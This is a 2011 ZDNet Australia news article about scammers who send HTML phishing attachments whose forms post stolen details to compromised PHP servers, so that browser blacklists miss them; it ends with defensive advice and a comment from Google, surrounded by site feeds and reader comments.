Breaking News: Research key to good apps: Westpac CIO

ZDNet / Security / Story

Phishers use new bait to trap victims

By on March 17th, 2011 

Topics

security, phishing, scam, html, firefox, chrome

Top related stories

Apple Isle opens cyber cop shop

Apple Isle opens cyber cop shop

Scams explode during 2010

Scams explode during 2010

100 pirates spread two-thirds of illegal P2P

100 pirates spread two-thirds of illegal P2P

Related gallery

AusCERT 2012 pics: Vaders and Terminators

AusCERT 2012 pics: Vaders and Terminators

Submit

To get around phishing blacklists in browsers, scammers are luring people by using HTML attachments instead of URLs, a security firm has warned.

HTML phishing scam

An example of a phishing attack encouraging the recipient to download an HTML attachment and provide information. Note the poor grammar, "required informations", which should be a red flag. (Credit: M86)

Chrome and Firefox are good at detecting phishing sites and warning web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via emails — attaching HTML files that are stored locally when they are opened, according to an M86 blog post.

After the user fills in a form with the information the scammers want to steal and clicks "submit", the HTML form sends the data through a POST request to a PHP (Hypertext Preprocessor) script hosted on a legitimate web server that has been compromised. (POST is used when a computer is sending data over the internet to a web server.) Because few PHP URLs are reported as abuse, this action does not trigger a warning from the browser, M86 said.

"Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective," the blog post said. "Logically, however, the browser should be able to detect a URL when the browser sends the POST request."

The phishing URLs alone without the HTML form are hard to verify because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting to a page belonging to the company the scammer was pretending to be, the post said.

To protect against this, people should avoid opening HTML attachments if the email seems suspicious and not provide any information in forms. Financial institutions do not send such attachments to customers.

While many people will click on a link in an email that looks like it comes from their bank, fewer are likely to open the HTML attachment.

Mozilla representatives did not provide comment on the report today. Meanwhile, Google provided this comment: "Google has a number of defences against phishing sites to help protect our users. For example, Gmail checks HTML attachments for phishing sites and displays a warning to users when one is detected. We always encourage users to be cautious when handling unexpected attachments and when providing personal information requested by email."

Via CNET

Talkback

Add your opinion

In order to post a comment, you need to be registered. (Sign In or register below)

Post your comment

Terms of Service - As a ZDNet registrant, and by using this service, you indicate that you agree to our Terms and Conditions and have read and understand our Privacy Policy.

Tech Blueprint

IT Priorities Special Report: Security

Emerging Technologies, and the New IT Security Landscape

IDC White Paper on Consumerisation Security

Get expert advice for developing or improving your BYOD security strategy.
Read white paper >

Mobile Trends and Perceptions

Survey by Decisive Analytics exposes the good and bad realities of BYOD.
Read analyst report >

ZDNet Australia Live

SuccessFactors launches Sydney datacentre to host BizX suite for local customers http://t.co/xKvbJnNj ^ST

SuccessFactors launches #Sydney datacentre - @ZDNet Australia : http://t.co/qyzZ4zZN

@Wow - thats one of the benefits of the iPad (and tablets in general). They are one of the most generation neutral products ever made. ...

13 minutes ago by Gav on Westpac board goes paperless with iPads

by http://t.co/vmlLt4bh: Kaspersky's antivirus denied on iOS: Kaspersky Lab is the latest company to be denied th... http://t.co/GpQkVZ2C

A farewell to democracy: Kaspersky http://t.co/VAIQbbXY

@mikey_halapir http://t.co/VOegcFoc FOUND IT.

Android's biggest security flaws http://t.co/00YQDw9T

SuccessFactors launches Sydney datacentre http://t.co/wdofhAGS

#DataCentre SuccessFactors launches Sydney datacentre - ZDNet Australia: SuccessFactors launches Sydney datacent... http://t.co/ajyQKEPL

SuccessFactors launches Sydney datacentre - ZDNet Australia: SuccessFactors launches Sydney datacentreZDNet Aust... http://t.co/VpHzoKJc

Kaspersky is now yet another company that Apple won't let make an official AV app for iOS. http://t.co/E0CsunQ1

and why is this such a super idea? http://www.itnews.com.au/News/301778,thousands-affected-in-billing-cloud-breach.aspx oh, yeah, right...

30 minutes ago by btone on Fed Govt steps up on shared cloud plan

SAP eyes cloud super network with Ariba buy: By Rachel King, ZDNet US on May 23rd, 2012 (5 mins ago) SAP America... http://t.co/gHVI2Q1x

BYOD too immature for us: Human Services http://t.co/d5bL19GZ via @zdnetaustralia

Kaspersky's antivirus denied on iOS: Kaspersky Lab is the latest company to be denied the chance to develop an o... http://t.co/ik2mlpZR

Dell profits plunge in spending lull - Hardware - News - ZDNet Australia | @scoopit http://t.co/iqiQnzox

Automation key for time-poor security boffins http://t.co/qyCXzOwl via @zdnetaustralia

Dell is suffering falling profits as companies hold off on their spending. http://t.co/iK5YBTSN ^ST

Kaspersky's antivirus denied on iOS: Kaspersky Lab is the latest company to be denied the chance to develop an o... http://t.co/0UnTxMKq

Fed Gov unveils draft strategy for "community clouds" http://t.co/9vQcu2AG via @zdnetaustralia #cloud <- specialised availability zones

Wow, seems like a fantastic initiative that helps to save the environment. It must have taken a lot of convincing to get the Board to mov...

1 hour ago by Wow on Westpac board goes paperless with iPads

What happens when you have 'too many cooks' while creating software: http://t.co/8ITO4zZs

SAP buys Ariba http://t.co/cQy8nVWp ^ST

Google closes Motorola Mobility deal - ZDNet Australia: http://t.co/njPFGeOB.auGoogle closes Motorola Mobility de... http://t.co/V6ygypla

by http://t.co/vmlLt4bh: SAP eyes cloud super network with Ariba buy: SAP America is looking to develop "the busi... http://t.co/9OhJ6p9V

SAP eyes cloud super network with Ariba buy http://t.co/7NL5eFce

BYOD too immature for us: Human Services http://t.co/s3x2cthG via @zdnetaustralia

Google closes Motorola Mobility deal: Google has finally closed its acquisition of Motorola Mobility, installed ... http://t.co/U2G7DO7D

The federal government has released guidelines for a community cloud to be shared by agencies http://t.co/57skHLug ^ST

Fed Govt steps up on shared cloud plan - Communications - News - ZDNet Australia | @scoopit http://t.co/s0x8e1hr

Now that Google has closed its acquisition of Motorola Mobility, what's next on the company's to do list? http://t.co/5aWbp9qe ^ML

Fed Govt steps up on shared cloud plan http://t.co/dY5uxJuh

I'm a payed up lib member who has voted Labor in the last 2 federal elections. I had the previlege of speaking to Mr Turnball 3 months ag...

1 hour ago by spazmanaught on NBN contracts may be left alone: Turnbull

Good to see Westpac's concentrating on the real IT issues !

1 hour ago by jeff_syd on Westpac board goes paperless with iPads

Fed Govt steps up on shared cloud plan - ZDNet Australia: The Australian Government Information... http://t.co/lIRepJnI #cloud #news #AU

by http://t.co/vmlLt4bh: Fed Govt steps up on shared cloud plan: The Federal Government has proposed advancing it... http://t.co/YO4h9UI8

Google closes Motorola Mobility deal http://t.co/BkGBmagB

Fed Govt steps up on shared cloud plan: The Federal Government has proposed advancing its shared cloud strategy ... http://t.co/Yc2QBYPx

Fed Govt steps up on shared cloud plan - ZDNet Australia: Fed Govt steps up on shared cloud planZDNet AustraliaT... http://t.co/5bb7Wz1G

BYOD: What the people think | ZDNet http://t.co/0EMHmiCg

I am not sure how this issue becomes an attack on Mr Turnbull. But I guess he is fair game. In any event I would have thought a Ddos woul...

12 hours ago by Doubt on National Botnet Network coming: Earthwave

I still use 98SE. Windows ME was an abortion in a bucket and Vista was ME without the bucket. My screen may look boring, but I jumped str...

12 hours ago by Treknology on Microsoft admits Vista was 'cheesy'

This story has been voted 10 times in the last 24 hours!

12 hours ago, CeBIT 2012 opens: photos

This story has been voted 15 times in the last 24 hours!

13 hours ago, Lenovo ThinkPad 3G tablet (32GB)

Well I don't know what they have done with their EFTPOS machines, local one in WA Coles Express I used this morning and I normally do "ch...

13 hours ago by harryinthesoup on Coles ditches PINs in payment pilot

6.7 M last ditch attempt - interesting - The Auckland region (population 1.4 mil) has estimated to have spent less than this in total ...

16 hours ago by debsteele on Vic scraps HealthSMART system

Interesting - no mention of Win 98/ME/2000 ... which heralded Internet access for millions of users ? I thought Win 98/ME would be the mo...

17 hours ago by gouranga on Microsoft admits Vista was 'cheesy'

An Application like Good from Good Technologies does the same thing, working with the enterprise email server and is off the shelf.

18 hours ago by Helpdesk123 on Westpac board goes paperless with iPads

Never mind a "B+" version, go for "C" and put in a few extras. I'd like a high speed ADC (100Msps) but that's just me... Final size? Equ...

18 hours ago by sa_penguin on Raspberry Pi architect mulls design change

what a non-story. these thing happen all the time. is zdnet short on material?

19 hours ago by paulwrussell on Spotify launch suffers redirect bungle

4 months old phone died. Took 6 weeks, three visits to the authorised repairer (Fonebiz) to "fix it". 2nd hand untested parts used, I say...

19 hours ago by paracin on Sony Ericsson Xperia Arc S

It's easy to rubbish an old operating system long after the rest of the world has already passed judgement upon it. I would be far more i...

20 hours ago by ramnet on Microsoft admits Vista was 'cheesy'

If Vista is cheesy, Metro is an over-ripe Stilton.

20 hours ago by meski on Microsoft admits Vista was 'cheesy'

you are kidding right - what qualification do you have to make such wildy stupid statements - do you really have customers who pay you fo...

21 hours ago by rant rant rant on National Botnet Network coming: Earthwave

Exactly. There are two topics of discussion, that are co-mingled; 1) Unauthorized software was put on the company device, by an IT person...

1 day ago by lamont on ABC's Bitcoin miner tackled in minutes

First off, Bitcoin is not a virus. Second off, the only way to generate Bitcoins, is by using a Bitcoin miner. More information on this h...

1 day ago by rizowski on ABC's Bitcoin miner tackled in minutes

When an operating system is sold it should not launch until an approved security service is purchased online with a list of approved supp...

1 day ago by Kevin Cobley on National Botnet Network coming: Earthwave

Facebook Activity

Keep up with ZDNet Australia

LinkedinLinkedin Join our network

RSS FeedsRSS Feeds Subscribe now

NewslettersNewsletters Subscribe today

AlertAlertsSubscribe now

ZDNet Events Calendar

ZDNet Events Calendar

Plan Comparison

Prev Next
Loading...
Deals powered by WhistleOut

Sponsored resources